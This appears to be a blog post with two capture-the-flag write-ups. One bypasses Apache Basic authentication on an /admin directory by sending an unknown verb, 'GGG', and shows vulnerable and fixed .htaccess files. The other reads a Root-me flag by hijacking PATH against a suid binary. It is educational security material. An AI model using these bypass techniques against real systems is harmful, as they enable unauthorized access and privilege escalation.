HTTP Verb Tampering

Here I have a static web page. I viewed the source and there aren’t any comments, Javascript, forms, or other exploitable features on the page.

I ran Dirbuster to discover additional unlinked content and found the directory /admin.

The Burp Suite Pro proxy history shows that the page is using Basic authentication.

I attempted to brute force the login but the password wasn’t found. Next I used Nmap to test for HTTP verb tampering.

Next I went back to Burp Suite, intercepted the request and changed the GET verb to GGG and was able to bypass authentication and retrieve the challenge password.

The GET method is one of many HTTP verbs, including POST GET PUT DELETE SPACEJUMP DEBUG OPTIONS TRACE CONNECT PROPFIND LOCK UNLOCK PROPPATCH MKCOL COPY MOVE.
Here is a sample .htaccess file in which the author only limited the GET verb, which I was able to easily bypass.
AuthName “restrict access”

AuthType Basic
AuthUserFile /usr/local/etc/httpd/users
< Limit GET POST >
require group staff
< /Limit >

Additionally you could put all HTTP verbs in the file:
AuthName “restrict all methods”

AuthType Basic
AuthUserFile /usr/local/etc/httpd/users
< Limit > POST GET PUT DELETE SPACEJUMP DEBUG OPTIONS TRACE CONNECT PROPFIND LOCK UNLOCK PROPPATCH MKCOL COPY MOVE>
require group staff
< /Limit >

However, you noticed that I was able to use Burp to tamper with the request and the server treated the unknown “GGG” as a GET request and allowed me to bypass authentication.
A safe alternative to prevent verb tampering is to remove all method limits which would require authentication for any methods which would catch anything you throw at it.
AuthName “restrict all methods except”

AuthType Basic
AuthUserFile /usr/local/etc/httpd/users
require group staff

Exploiting suid binary on Root-me.org ELF32 – System 1

Once logged in, I issued the “ls -l” command and find the binary “ch11” as well as the source code file. Notice the permissions of ch11 is suid root and our user account doesn’t have permissions to view the contents of the .passwd file which contains the flag. Even without the source code file, we can use the “strings” command to find enough of a clue to solve this challenge without a debugger. Notice the “ls /challenge/app-script/ch11/.passwd” where the .passwd file contains the flag.

I execute the ch11 binary:

Since the binary is suid, whatever command it executes runs as the file owner instead of our user.

I copied the /bin/cat command to /tmp/ls and export my path to /tmp and run the ch11 binary again. This time it executes the cat command from the /tmp/ls command and outputs the flag in the “.passwd” file!